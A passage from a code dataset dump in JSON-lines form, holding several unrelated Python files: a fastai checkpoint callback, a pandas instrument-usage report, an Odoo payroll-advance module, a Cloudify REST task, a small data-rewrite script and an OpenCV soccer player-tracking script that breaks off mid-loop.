self.learn.save(f'{self.name}_{epoch}')\n else: # every=\"improvement\"\n current = self.get_monitor_value()\n if current is not None and self.operator(current, self.best):\n self.best = current\n self.learn.save(f'{self.name}_{self.monitor}')\n\n def on_train_end(self, **kwargs):\n if self.every == \"improvement\":\n self.learn.load(f'{self.name}_{self.monitor}')\n\n\n@dataclass\nclass SavePredictionCallback(TrackerCallback):\n \"A `LearnerCallback` that saves the model when monitored quantity is best.\"\n\n record_folder: str = None\n ylookup: List = None\n every: str = 'improvement'\n\n def __post_init__(self):\n super().__post_init__()\n\n def on_epoch_begin(self, **kwargs):\n self.outputs = []\n\n def on_batch_end(self, last_output: Tensor, train, **kwargs):\n\n if train is False:\n output = torch.exp(last_output).detach().cpu().numpy()\n\n self.outputs.append(output)\n\n def on_epoch_end(self, epoch, train, **kwargs: Any)->None:\n if train is False:\n if isinstance(self.every, int):\n if (epoch % self.every) == 0:\n ######\n total_output = np.concatenate(\n self.outputs, axis=0).tolist()\n\n with open(self.record_folder + 'predictions' + '_' + str(epoch) + '.json', 'w') as f:\n json.dump(total_output, f)\n else:\n current = self.get_monitor_value()\n if current is not None and self.operator(current, self.best):\n self.best = current\n\n ######\n total_output = np.concatenate(\n self.outputs, axis=0).tolist()\n\n with open(self.record_folder + 'predictions_' + self.monitor + '.json', 'w') as f:\n json.dump(total_output, f)\n","sub_path":"uncased-baseline/zheng/tracktrack.py","file_name":"tracktrack.py","file_ext":"py","file_size_in_byte":4742,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"552481686","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Tue Oct 1 06:49:13 2019\r\npip install fuzzywuzzy\r\n\r\n\r\nhttps://marcobonzanini.com/2015/02/25/fuzzy-string-matching-in-python/\r\n\r\n@author: rzhou11\r\n\"\"\"\r\nimport pandas as pd\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\nimport matplotlib.dates as mdates\r\nimport datetime\r\n\r\ntoday=datetime.date.today()\r\n#print(today)\r\nthis_month=int(str(today)[5:7])\r\n#print(type(this_month))\r\n#9 0).sum(), axis=1)-1\r\n\r\ndf['No. 
of Month Used']=df_count\r\n\r\ndf['Monthly average']=round(df_sum/df_count)\r\n\r\ndf=df.sort_values('Monthly average', ascending = False)\r\n\r\nuser_monthly=MonthOrdered(df)\r\n\r\nuser_monthly.to_excel(writer,sheet_name='2018 user monthly')\r\n\r\n\r\n##--------------------2019---------------------------------------------\r\n\r\n\r\njobs=jobs2019\r\n\r\n\r\n\r\n#-------------------- Smaples per instrument per month ------------------------\r\n\r\ninstrument_monthly = jobs.groupby('Instrument').resample('M')[y_data].count()\r\ndf=instrument_monthly\r\n\r\ndf= df.reset_index()\r\n\r\ndf[time_index]= df[time_index].dt.strftime('%b')\r\n\r\ndf = df.pivot(index='Instrument',columns='Date modified',values='File Name')\r\n\r\ninstrument_monthly=MonthOrdered(df)\r\n\r\ninstrument_monthly.to_excel(writer,sheet_name='2019 instrument monthly')\r\n\r\n\r\n\r\n\r\n##--------------------Yearly total jobs----------------------\r\nyearly2019=jobs.resample('Y').count()\r\n#print('Total samples for the year of 2019: '+str(yearly2019[y_data][0])+'!')\r\nyearly2019[y_data].to_excel(writer,sheet_name='2019 yearly')\r\n\r\n##--------------------Monthly total jobs----------------------\r\n\r\nmonthly = jobs.resample('M').count() # count monthly total number of jobs\r\nmonthly.reset_index(inplace= True)\r\n#monthly['Month']= monthly[time_index].dt.strftime('%Y-%m')\r\n\r\nmonthly['Month']= monthly[time_index].dt.strftime('%b')\r\n#print(monthly['Month'])\r\nmonthly2019=monthly[['Month','File Name']]\r\n\r\n#print('Monthly samples for the year of 2019: \\n'+ str(monthly2019[y_data]))\r\n\r\n\r\nmonthly2019.to_excel(writer,sheet_name='2019 monthly',index=False)\r\n\r\n##--------------------Hourly total jobs----------------------\r\nhourly = jobs.resample('H').count() # count hourly jobs for each day\r\nhourly.reset_index(inplace= True)\r\nhourly['hours'] = hourly[time_index].dt.hour # extract hours from the datetime\r\nhourly_group = hourly.groupby('hours')[y_data].sum()\r\n\r\nhourly_group.to_excel(writer,sheet_name='2019 hourly')\r\n\r\n#print(hourly_group)\r\n\r\n\r\n#-------------------- Total jobs per weekday ------------------------\r\ndays = jobs.resample('D').count()\r\ndays.reset_index(inplace = True)\r\ndays['weekday'] = days[time_index].dt.strftime('%a')\r\ndays_group = days.groupby('weekday')[y_data].sum().reindex(weekday_order)\r\n\r\n#days_group = days.groupby('weekday')[y_data].sum().sort_values(ascending=False)\r\n\r\n\r\ndays_group.to_excel(writer,sheet_name='2019 weekday')\r\n\r\n\r\n\r\n#--------------group by month and user----------------------------\r\n\r\nuser_monthly = jobs.groupby('User_edited').resample('M')[y_data].count()\r\n\r\ndf=user_monthly\r\n\r\ndf = df.reset_index()\r\n\r\ndf[time_index]= df[time_index].dt.strftime('%b')\r\n\r\ndf=df.pivot(index='User_edited',columns='Date modified',values='File Name')\r\n\r\n\r\ndf_sum=df.sum(axis=1)\r\n\r\ndf['Total samples']=df_sum\r\n\r\ndf_count=df.apply(lambda s: (s > 0).sum(), axis=1)-1\r\n\r\ndf['No. 
of Month Used']=df_count\r\n\r\ndf['Monthly average']=round(df_sum/df_count)\r\n\r\ndf=df.sort_values('Monthly average', ascending = False)\r\n\r\nuser_monthly=MonthOrdered(df)\r\n\r\nuser_monthly.to_excel(writer,sheet_name='2019 user monthly')\r\n\r\n\r\n\r\nwriter.save()\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n#http://strftime.org/\r\n#Code\tMeaning\tExample\r\n#%a\tWeekday as locale’s abbreviated name.\tMon\r\n#%A\tWeekday as locale’s full name.\tMonday\r\n#%w\tWeekday as a decimal number, where 0 is Sunday and 6 is Saturday.\t1\r\n#%d\tDay of the month as a zero-padded decimal number.\t30\r\n#%-d\tDay of the month as a decimal number. (Platform specific)\t30\r\n#%b\tMonth as locale’s abbreviated name.\tSep\r\n#%B\tMonth as locale’s full name.\tSeptember\r\n#%m\tMonth as a zero-padded decimal number.\t09\r\n#%-m\tMonth as a decimal number. (Platform specific)\t9\r\n#%y\tYear without century as a zero-padded decimal number.\t13\r\n#%Y\tYear with century as a decimal number.\t2013\r\n#%H\tHour (24-hour clock) as a zero-padded decimal number.\t07\r\n#%-H\tHour (24-hour clock) as a decimal number. (Platform specific)\t7\r\n#%I\tHour (12-hour clock) as a zero-padded decimal number.\t07\r\n#%-I\tHour (12-hour clock) as a decimal number. (Platform specific)\t7\r\n#%p\tLocale’s equivalent of either AM or PM.\tAM\r\n#%M\tMinute as a zero-padded decimal number.\t06\r\n#%-M\tMinute as a decimal number. (Platform specific)\t6\r\n#%S\tSecond as a zero-padded decimal number.\t05\r\n#%-S\tSecond as a decimal number. (Platform specific)\t5\r\n#%f\tMicrosecond as a decimal number, zero-padded on the left.\t000000\r\n#%z\tUTC offset in the form +HHMM or -HHMM (empty string if the the object is naive).\t\r\n#%Z\tTime zone name (empty string if the object is naive).\t\r\n#%j\tDay of the year as a zero-padded decimal number.\t273\r\n#%-j\tDay of the year as a decimal number. (Platform specific)\t273\r\n#%U\tWeek number of the year (Sunday as the first day of the week) as a zero padded decimal number. All days in a new year preceding the first Sunday are considered to be in week 0.\t39\r\n#%W\tWeek number of the year (Monday as the first day of the week) as a decimal number. All days in a new year preceding the first Monday are considered to be in week 0.\t39\r\n#%c\tLocale’s appropriate date and time representation.\tMon Sep 30 07:06:05 2013\r\n#%x\tLocale’s appropriate date representation.\t09/30/13\r\n#%X\tLocale’s appropriate time representation.\t07:06:05\r\n#%%\tA literal '%' character.\t%","sub_path":"script/Step 6. Resample by Year-Month-Hour-User.py","file_name":"Step 6. Resample by Year-Month-Hour-User.py","file_ext":"py","file_size_in_byte":10531,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"309596829","text":"# -*- coding: utf-8 -*-\n# Copyright 2018 Elitumdevelop S.A, Ing. 
Mario Rangel\n# License LGPL-3.0 or later (http://www.gnu.org/licenses/lgpl.html).\n\nfrom odoo import api, fields, models\nfrom odoo.exceptions import UserError\nfrom datetime import datetime\nfrom odoo.exceptions import ValidationError\n\n\nclass LinesAdvancePayment(models.Model):\n _name = 'eliterp.lines.advance.payment'\n\n _rec_name = \"employee_id\"\n\n _description = 'Líneas de anticipo de quincena'\n\n @api.multi\n def unlink(self):\n \"\"\"\n No eliminamos líneas contabilizadas\n :return:\n \"\"\"\n for line in self:\n if line.parent_state == 'posted':\n raise UserError(\"No podemos borrar líneas de anticipo contabilizadas.\")\n return super(LinesAdvancePayment, self).unlink()\n\n @api.depends('advanced_id.state')\n def _compute_parent_state(self):\n \"\"\"\n Obtenemos el estado del padre\n \"\"\"\n for record in self.filtered('advanced_id'):\n record.parent_state = record.advanced_id.state\n\n @api.one\n @api.depends('amount_advance', 'mobilization')\n def _get_total(self):\n \"\"\"\n Total de línea\n \"\"\"\n self.amount_total = round(self.amount_advance + self.mobilization, 2)\n\n employee_id = fields.Many2one('hr.employee', string='Empleado')\n job_id = fields.Many2one('hr.job', string='Cargo de trabajo', related='employee_id.job_id', store=True)\n admission_date = fields.Date(related='employee_id.admission_date', store=True, string='Fecha ingreso')\n amount_advance = fields.Float('Monto', default=0.00)\n mobilization = fields.Float(string='Movilización')\n antiquity = fields.Integer('Días')\n amount_total = fields.Float('Total', compute='_get_total', store=True)\n advanced_id = fields.Many2one('eliterp.advance.payment', 'Anticipo', ondelete=\"cascade\")\n parent_state = fields.Char(compute=\"_compute_parent_state\", string=\"Estado de anticipo\")\n\n\nclass ReasonDenyAdvance(models.TransientModel):\n _name = 'eliterp.reason.deny.advance'\n\n _description = 'Razón para negar anticipo de quincena'\n\n description = fields.Text('Descripción', required=True)\n\n @api.multi\n def deny_advance(self):\n \"\"\"\n Cancelamos el anticipo de quincena\n \"\"\"\n advance_id = self.env['eliterp.advance.payment'].browse(self._context['active_id'])\n advance_id.update({\n 'state': 'deny',\n 'reason_deny': self.description\n })\n return advance_id\n\n\nclass AdvancePayment(models.Model):\n _name = 'eliterp.advance.payment'\n _inherit = ['mail.thread']\n\n _description = 'Anticipo de quincena'\n\n @api.multi\n def print_advance(self):\n \"\"\"\n Imprimimos anticipo\n \"\"\"\n self.ensure_one()\n return self.env.ref('eliterp_hr.eliterp_action_report_advance_payment').report_action(self)\n\n @api.multi\n def button_cancel(self):\n self.write({'state': 'cancel'})\n\n def _get_antiquity(self, employee):\n \"\"\"\n Obtener días de antiguedad con fecha de documento\n :param employee:\n :return: integer\n \"\"\"\n start_date = datetime.strptime(employee.admission_date, '%Y-%m-%d')\n end_date = datetime.strptime(self.date, '%Y-%m-%d')\n time = (str(end_date - start_date)).strip(', 0:00:00')\n days = 0\n if time:\n days = int(\"\".join([x for x in time if x.isdigit()]))\n return days\n\n def load_employees(self):\n \"\"\"\n Cargamos empleados para total de anticipo, debe tener un contrato el empleado\n \"\"\"\n if self.lines_advance:\n self.lines_advance.unlink() # Borramos líneas anteriores, no montar\n list_employees = []\n for employee in self.env['hr.employee'].search([\n ('active', '=', True),\n ('contract_id', '!=', False),\n ('project_id', '=', self.project_id.id)\n ]):\n amount_advance = 0.0 # 
Para MAEQ se trabajará así por el momento la variable está configurada en Ajustes\n # RRHH\n antiquity = self._get_antiquity(employee)\n if antiquity >= self.advance_days:\n amount_advance = round(float((employee.wage * 40) / 100), 2)\n else:\n amount_advance = 80.0\n list_employees.append([0, 0, {\n 'employee_id': employee.id,\n 'antiquity': antiquity,\n 'mobilization': round(employee.mobilization / 2, 2),\n 'amount_advance': amount_advance,\n }])\n return self.write({'lines_advance': list_employees})\n\n @api.one\n @api.depends('lines_advance')\n def _get_total(self):\n \"\"\"\n Total de líneas de anticipo\n \"\"\"\n self.total = sum(line.amount_total for line in self.lines_advance)\n\n @api.multi\n def to_approve(self):\n \"\"\"\n Solicitar aprobación de anticipo de quincena\n \"\"\"\n if not self.lines_advance:\n raise UserError(\"No hay líneas de anticipo creadas.\")\n self.update({'state': 'to_approve'})\n # Enviar correo a usuarios para aprobación\n self.env['eliterp.managerial.helps'].send_mail(self.id, self._name, 'eliterp_approve_advance_mail')\n\n @api.multi\n def reviewed(self):\n \"\"\"\n Revisado\n \"\"\"\n self.update({'state': 'reviewed', 'reviewed_user': self._uid})\n\n @api.multi\n def approve(self):\n \"\"\"\n Aprobar anticipo de quincena\n \"\"\"\n self.update({'state': 'approve', 'approval_user': self._uid})\n\n @api.multi\n def open_reason_deny_advance(self):\n \"\"\"\n Abrir ventana emergente para cancelar anticipo\n :return: dict\n \"\"\"\n return {\n 'name': \"Explique la razón\",\n 'view_mode': 'form',\n 'view_type': 'form',\n 'res_model': 'eliterp.reason.deny.advance',\n 'type': 'ir.actions.act_window',\n 'target': 'new',\n }\n\n @api.multi\n def posted_advance(self):\n \"\"\"\n Contabilizar anticipo\n \"\"\"\n ref = \"Anticipo de \" + self.period\n move_id = self.env['account.move'].create({\n 'journal_id': self.journal_id.id,\n 'date': self.date,\n 'ref': ref\n })\n account_debit = self.journal_id.default_debit_account_id.id\n account_credit = self.journal_id.default_credit_account_id.id\n if not account_credit or not account_debit:\n raise UserError('No existe cuenta acredora y/o deudora en diario.')\n self.env['account.move.line'].with_context(check_move_validity=False).create({\n 'name': ref,\n 'journal_id': self.journal_id.id,\n 'account_id': account_credit,\n 'move_id': move_id.id,\n 'project_id': self.project_id.id,\n 'debit': 0.0,\n 'credit': self.total,\n 'date': self.date\n })\n self.env['account.move.line'].with_context(check_move_validity=True).create({\n 'name': ref,\n 'journal_id': self.journal_id.id,\n 'account_id': account_debit,\n 'move_id': move_id.id,\n 'project_id': self.project_id.id,\n 'debit': self.total,\n 'credit': 0.0,\n 'date': self.date\n })\n move_id.post()\n return self.write({\n 'name': move_id.name,\n 'state': 'posted',\n 'move_id': move_id.id\n })\n\n @api.one\n @api.depends('date')\n def _get_period(self):\n \"\"\"\n Obtenemos el período con la fecha de emisión\n \"\"\"\n month = self.env['eliterp.global.functions']._get_month_name(int(self.date[5:7]))\n self.period = \"%s [%s]\" % (month, self.date[:4])\n\n @api.depends('lines_advance')\n def _get_count_lines(self):\n \"\"\"\n Cantidad de líneas de anticipo\n \"\"\"\n for record in self:\n record.count_lines = len(record.lines_advance)\n\n @api.multi\n def unlink(self):\n \"\"\"\n No eliminamos roles diferentes de borrador\n :return:\n \"\"\"\n for line in self:\n if line.state != 'draft':\n raise ValidationError(\"No podemos borrar anticipos diferentes de borrador.\")\n return 
super(AdvancePayment, self).unlink()\n\n name = fields.Char('No. Documento', index=True, default='Nuevo')\n period = fields.Char('Período', compute='_get_period', store=True)\n date = fields.Date('Fecha de emisión', default=fields.Date.context_today, required=True,\n readonly=True, states={'draft': [('readonly', False)]})\n lines_advance = fields.One2many('eliterp.lines.advance.payment', 'advanced_id', string='Líneas de anticipo')\n move_id = fields.Many2one('account.move', string='Asiento contable')\n total = fields.Float('Total de anticipo', compute='_get_total', store=True, track_visibility='onchange')\n journal_id = fields.Many2one('account.journal', string=\"Diario de anticipo\",\n default=lambda self: self.env.ref(\"eliterp_hr.eliterp_journal_advance_payment\").id)\n state = fields.Selection([\n ('draft', 'Borrador'),\n ('to_approve', 'Por aprobar'),\n ('reviewed', 'Revisado'),\n ('approve', 'Aprobado'),\n ('posted', 'Contabilizado'),\n ('deny', 'Negado'),\n ('cancel', 'Anulado')], string=\"Estado\", default='draft', track_visibility='onchange')\n approval_user = fields.Many2one('res.users', string='Aprobado por', copy=False)\n reviewed_user = fields.Many2one('res.users', string='Revisado por')\n reason_deny = fields.Text('Negado por')\n count_lines = fields.Integer('Nº empleados', compute='_get_count_lines')\n comment = fields.Text('Notas y comentarios', readonly=True, states={'draft': [('readonly', False)]})\n # Dato parametrizado para MAEQ (Pago de ADQ según días de empleados)\n advance_days = fields.Integer('Días de ADQ')\n","sub_path":"eliterp_hr/models/advance_payment.py","file_name":"advance_payment.py","file_ext":"py","file_size_in_byte":10033,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"222616826","text":"########\n# Copyright (c) 2014-2018 Cloudify Platform Ltd. 
All rights reserved\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nimport traceback\nfrom cloudify import ctx\nfrom cloudify.exceptions import NonRecoverableError, RecoverableError\nfrom rest_sdk import utility, exceptions\n\n\ndef execute(params=None, template_file=None, **kwargs):\n\n params = params or {}\n template_file = template_file or ''\n\n ctx.logger.debug(\n 'execute \\n params {} \\n template \\n {}'.format(params, template_file))\n runtime_properties = ctx.instance.runtime_properties.copy()\n if not params:\n params = {}\n runtime_properties.update(params)\n _execute(runtime_properties, template_file, ctx.instance, ctx.node)\n\n\ndef execute_as_relationship(params, template_file, **kwargs):\n ctx.logger.debug(\n 'execute_as_relationship \\n '\n 'params {} \\n template {}\\n'.format(params, template_file))\n if not params:\n params = {}\n runtime_properties = ctx.target.instance.runtime_properties.copy()\n runtime_properties.update(ctx.source.instance.runtime_properties)\n runtime_properties.update(params)\n _execute(runtime_properties, template_file, ctx.source.instance,\n ctx.source.node)\n\n\ndef _execute(params, template_file, instance, node):\n if not template_file:\n ctx.logger.info(\n 'Processing finished. No template file provided.')\n return\n template = ctx.get_resource(template_file)\n try:\n instance.runtime_properties.update(\n utility.process(params, template, node.properties.copy()))\n except exceptions.NonRecoverableResponseException as e:\n raise NonRecoverableError(e)\n\n except (exceptions.RecoverableResponseException,\n exceptions.RecoverableStatusCodeCodeException,\n exceptions.ExpectationException)as e:\n raise RecoverableError(e)\n except Exception as e:\n ctx.logger.info(\n 'Exception traceback : {}'.format(traceback.format_exc()))\n raise NonRecoverableError(e)\n","sub_path":"cloudify_rest/tasks.py","file_name":"tasks.py","file_ext":"py","file_size_in_byte":2540,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"35987131","text":"from ast import literal_eval\r\nfrom collections import Counter, defaultdict\r\n\r\nold_file = '../../data/MLSA/lemmas_tagged.txt'\r\nnew_file = '../../data/MLSA/test_data.txt'\r\n\r\ndata = defaultdict(Counter)\r\n\r\nwith open(old_file, 'r', encoding='utf8') as f_in:\r\n for line in f_in:\r\n lemma, string = line.strip().split(' ', 1)\r\n answers = literal_eval(string)\r\n data[lemma].update(answers)\r\n\r\nwith open(new_file, 'w', encoding='utf8') as f_out:\r\n for lemma, answers in sorted(data.items()):\r\n if lemma[-1] == 'A': # Convert from 'A' to 'AJ'\r\n lemma += 'J'\r\n ans_str = ''\r\n for pol, n in answers.items():\r\n if not pol:\r\n pol = '0'\r\n ans_str += pol * n\r\n f_out.write('{}\\t{}\\n'.format(lemma, ans_str))","sub_path":"src/eval/layer23rewrite.py","file_name":"layer23rewrite.py","file_ext":"py","file_size_in_byte":795,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"637338603","text":"from 
__future__ import print_function # print_function 이라는 모듈에서 future만 뽑아서 사용 # python 2에서 python3의 문법을 사용하기 위해\r\nimport numpy as np # np numarray 이미지 파일을 배열형식으로 뽑아낼때 사용 \r\nimport cv2 # 오픈cv 열기\r\nimport os # 운영체제 기능을 파이썬에서 사용 ex 파일입출력\r\nimport sys # 환경변수같은 인수를 입력받는 모듈\r\nimport random # 난수 생성할때 사용하는 모듈\r\nimport imutils # image utils 이미지 관련된 유틸리티 - opencv와 관련된 라이브러리\r\n# import pycuda\r\nimport math\r\nimport collections\r\nimport heatmap\r\nfrom datetime import datetime\r\nfrom PIL import ImageFont, ImageDraw, Image\r\nfrom moviepy.editor import * # moviepy 라이브러리 :\r\nfrom moviepy.video.io.ffmpeg_tools import ffmpeg_extract_subclip # 하이라이트 영상 추출을 위해 구간 자르는 라이브러리 \r\n\r\n# 히트맵에 각기 다른 색상을 표현하기 위한 튜플로 된 리스트 12개를 정의\r\ncolors12 = [(0,0,0),(255,255,255),(255,0,0),(0,255,0),(0,0,255),(255,255,0),(0,255,255),(255,0,255),(192,192,192),(244,164,96),(128,128,0),(240, 50, 230)]\r\n\r\n# 각 팀 선수들이 전체 경기 중 공을 점유한 프레임 수 \r\nball_share_A = [] \r\nball_share_B = []\r\n\r\n# 팀 단위로 경기 동안 공을 점유한 프레임 수 \r\nsum_ball_A = 0\r\nsum_ball_B = 0\r\n\r\n\r\ndef selectMultiROI(player_cnt, team_cnt, team) :\r\n global p, bboxes, colors\r\n\r\n while True:\r\n \r\n print('Select the Player')\r\n \r\n cv2.putText(frame, str(team)+' Team ', (50, 30), cv2.FONT_HERSHEY_COMPLEX, 1, (255,255,255), 2, cv2.LINE_AA) \r\n cv2.putText(frame, ' Done: '+str(player_cnt-1)+' / Total: '+str(team_cnt),(45, 60), cv2.FONT_HERSHEY_COMPLEX, 0.5, (255,255,255), 1, cv2.LINE_AA) \r\n #now = datetime.now()\r\n #curTime = now.strftime('%H:%M:%S')\r\n videoLen = int(cap.get(cv2.CAP_PROP_FRAME_COUNT))\r\n videoFps = cap.get(cv2.CAP_PROP_FPS)\r\n videoTime = int((videoLen / videoFps)) # 동영상 재생 시간을 초로 반환\r\n \r\n # 분석하는데 남은 에상 소요시간\r\n analTime = videoTime * (team_cnt-player_cnt+1)\r\n if analTime < 60 :\r\n minute = 0\r\n second = analTime\r\n else :\r\n minute = int(analTime / 60) # 분\r\n second = analTime % 60 # 초 \r\n \r\n cv2.putText(frame, ' Processing times: '+str(minute)+'m '+str(second)+'s',(45, 85), cv2.FONT_HERSHEY_COMPLEX, 0.5, (255,255,255), 1, cv2.LINE_AA) \r\n \r\n #finishTime = \r\n #cv2.putText(frame, ' current time: '+str(curTime),(45, 90), cv2.FONT_HERSHEY_COMPLEX, 0.5, (255,0,0), 1, cv2.LINE_AA) #Multitracker_Window\r\n #cv2.putText(frame, ' estimated finish time: '+str(videoTime),(45, 120), cv2.FONT_HERSHEY_COMPLEX, 0.5, (255,0,0), 1, cv2.LINE_AA) #Multitracker_Window\r\n \r\n # 0:0 -> 1:0\r\n\r\n # ?draw bounding boxes over objects\r\n # ?selectROI's default behaviour is to draw box starting from the center\r\n # ?when fromCenter is set to false, you can draw box starting from top left corner\r\n bbox = cv2.selectROI('MultiTracker', frame) #roi 를 선택하는 함수-길\r\n #roi 정보가 bbox 에 저장되어 사용된다-길\r\n #tracker.init(frame123, bbox) # 오브젝트 트래커가 frame123과 bboc를 따라가게끔 설정한다.\r\n bboxes.append(bbox)\r\n if (p<6):\r\n colors.append((0,0,255))\r\n else:\r\n colors.append((255,0,0))\r\n print(\"Press q to quit selecting boxes and start tracking\")\r\n print(\"Press any other key to select next object : \", p)\r\n p=p+1\r\n k = cv2.waitKey(0) & 0xFF\r\n if (k == 113): # q is pressed\r\n break\r\n print('Selected bounding boxes {}'.format(bboxes))\r\n return\r\n\r\ndef readBallCoord() : # ball_coord.txt 파일에서 공 좌표 읽어오는 함수 \r\n y, x, z = np.genfromtxt('ball_coord_TEST.txt', delimiter=',', unpack=True,dtype=int)\r\n return (x,y, z)\r\n\r\n\r\n\r\nif __name__ == '__main__':\r\n \r\n \r\n ######################################################\r\n \r\n A = int(input('Home팀의 인원 입력 : '))\r\n B = int(input('Away팀의 인원 입력 : ')) \r\n \r\n # 6명 vs 6명으로 뛴다고 입력 
받았을 경우\r\n total_player = A + B # 경기에 참여하는 플레이어 수가 12명인 경우\r\n flag = A\r\n ######################################################\r\n \r\n \r\n for player in range(1, total_player+1): # 선수 1부터 total_player까지 반복문\r\n \r\n tracker = cv2.TrackerCSRT_create() # CSRT tracker 초기화\r\n #videoPath = 'near_2.mov' # 비디오를 읽어옴\r\n videoPath = 'TEST.mov' # 비디오를 읽어옴\r\n \r\n # Create a video capture object to read videos \r\n cap = cv2.VideoCapture(videoPath) #비디오를 읽는 함수-길\r\n \r\n # Set video to load\r\n success, frame = cap.read()\r\n \r\n fps = cap.get(cv2.CAP_PROP_FPS)\r\n fps = round(fps,0)\r\n\r\n frame = imutils.resize(frame, width=1000) # 리사이징\r\n print(frame.shape)\r\n \r\n \r\n \r\n # backSub = cv2.createBackgroundSubtractorMOG2() # cv에서 제공하는 배경제거를 위한 마스크 초기화\r\n # backSub = cv2.bgsegm.createBackgroundSubtractorGMG() 사람이 흰점이 되지만 꽤 괜찮음\r\n\r\n \r\n heatmap_background = cv2.imread('heatmap2.png') # 히트맵창의 배경 지정\r\n original = cv2.imread('heatmap2.png')\r\n\r\n player_file = open( 'player_coord.txt', 'w' ) # 좌표값을 저장할 파일\r\n \r\n \r\n # 영상 읽기에 실패 예외처리\r\n if not success:\r\n print('Failed to read video')\r\n sys.exit(1)\r\n\r\n ## Select boxes 빈 리스트 선언\r\n bboxes = []\r\n colors = [] \r\n p=0\r\n # OpenCV의 selectROI 함수는 다중 객체 선택을 지원하지 않으므로 반복문을 통해 다중 ROI 지정을 구현\r\n # while True:\r\n \r\n # fgMask = backSub.apply(frame) # frame에 배경제거 mask를 적용시켜 이미지 생성\r\n\r\n # print('Select the Player')\r\n\r\n # # ?draw bounding boxes over objects\r\n # # ?selectROI's default behaviour is to draw box starting from the center\r\n # # ?when fromCenter is set to false, you can draw box starting from top left corner\r\n # bbox = cv2.selectROI('MultiTracker', frame) #roi 를 선택하는 함수-길\r\n # #roi 정보가 bbox 에 저장되어 사용된다-길\r\n # #tracker.init(frame123, bbox) # 오브젝트 트래커가 frame123과 bboc를 따라가게끔 설정한다.\r\n # bboxes.append(bbox)\r\n # if (p<6):\r\n # colors.append((0,0,255))\r\n # else:\r\n # colors.append((255,0,0))\r\n # print(\"Press q to quit selecting boxes and start tracking\")\r\n # print(\"Press any other key to select next object : \", p)\r\n # p=p+1\r\n # k = cv2.waitKey(0) & 0xFF\r\n # if (k == 113): # q is pressed\r\n # break\r\n # print('Selected bounding boxes {}'.format(bboxes))\r\n \r\n \r\n if player <= flag : \r\n team_name = 'Home'\r\n player_num = player\r\n selectMultiROI(player_num, A, team_name);\r\n else :\r\n team_name = 'Away'\r\n player_num = player-flag\r\n selectMultiROI(player_num, B, team_name);\r\n\r\n\r\n\r\n # Create MultiTracker object\r\n multiTracker = cv2.MultiTracker_create()\r\n \r\n #좌표를 표현할 이름있는 튜플\r\n Point = collections.namedtuple('Point',['x','y'])\r\n lastPoint = Point(x=-1, y=-1) # 과거의 좌표값을 저장할 튜플, -1로 초기화\r\n estimate_distance = 0 # 영상기반 추정거리값을 저장\r\n distance = 0 # 거리값을 저장\r\n frame_cnt = 0 # 프레임을 카운팅함\r\n show_goal_frame = 0 # 골인 경우 화면에 fps 프레임수 동안 \"골인입니다\" 표시하기 위해\r\n ball_frame_cnt = 0 # 공을 인식한 프레임을 따로 저장 \r\n pre_frame_cnt =0 # 목적: 공이 인식된 현 프레임과 이전 프레임의 '차'를 계산\r\n ball_touch = 0 # roi로 선택한 선수가 공을 점유한 프레임 수(볼 터치 수)를 카운팅함 \r\n moving_weight = 0 # 움직인 거리의 비중을 저장\r\n top_speed = 0 # 최고 속도를 저장\r\n accumulate_speed = 0 # 속도들의 누적값\r\n temp_distance = 0 # 뛴 거리를 임시저장\r\n temp_speed = 0 # 뛴 속도를 임시저장\r\n interval = 30 # 특정 시간(초)\r\n interval_distance = 0 # 특정 시간마다의 뛴거리\r\n interval_acc_speed = 0 # 특정 시간마다의 속도 누적값\r\n interval_avg_speed = 0 # 특정 시간마다의 평균속도\r\n str_coord = ''\r\n walk_cnt=0\r\n jog_cnt=0\r\n sprint_cnt = 0\r\n highlight_goal_point = 0 # 하이라이트 추출시 골인인 프레임을 중심으로 앞뒤로 6초동안 보여주기\r\n \r\n blue_ROI = False # ROI 색이 파란색으로 바뀐 경우 -> True\r\n red_ROI_cnt = 0 # roi가 파란색에서 빨간색으로 바뀐 경우 
빨간색을 유지하는 프레임 수를 카운팅함\r\n is_pass = False # roi 파 -> 빨 바뀌는 경우(1): 패스인 경우 \r\n is_dribble = False # roi 파 -> 빨 바뀌는 경우(2): 선수가 드리블하는 중인 경우 \r\n pass_count = 0 # 선수의 패스 횟수 실시간 카운팅\r\n \r\n \r\n coord_head=coord_tail= Point(x=0,y=0)\r\n \r\n ball_x,ball_y,ball_frame_cnt = readBallCoord() # 공의 좌표, 공이 인식된 프레임 읽어오기\r\n\r\n # Initialize MultiTracker \r\n for bbox in bboxes:\r\n multiTracker.add(tracker, frame, bbox)\r\n # multiTracker.add(tracker, fgMask, bbox)\r\n\r\n \r\n ################################################################################################################################################### \r\n ###################################################################영상을 열음#########################################################################\r\n \r\n while cap.isOpened():#비디오가 잘 열렸는지 확인하는 함수-길\r\n success, frame = cap.read()# cap.read() 는 동영상을 1프레임씩 읽어오는 것-길\r\n\r\n if not success:\r\n break\r\n\r\n frame = imutils.resize(frame, width=1000) # 리사이징\r\n \r\n #fgMask = backSub.apply(frame) # 프레임에 마스크를 적용시켜 그레이스케일로 만들어줌\r\n\r\n\r\n # get updated location of objects in subsequent frames\r\n # success, boxes = multiTracker.update(frame) #update() 따라가게 만드는 함수 - 길\r\n success, boxes = multiTracker.update(frame)\r\n \r\n if(frame_cnt==0) : # 코드 속도개선을 위해 중복되는 코드는 한번만 수행되도록함\r\n height,width ,channels = frame.shape #maintain all tabs in same shape\r\n 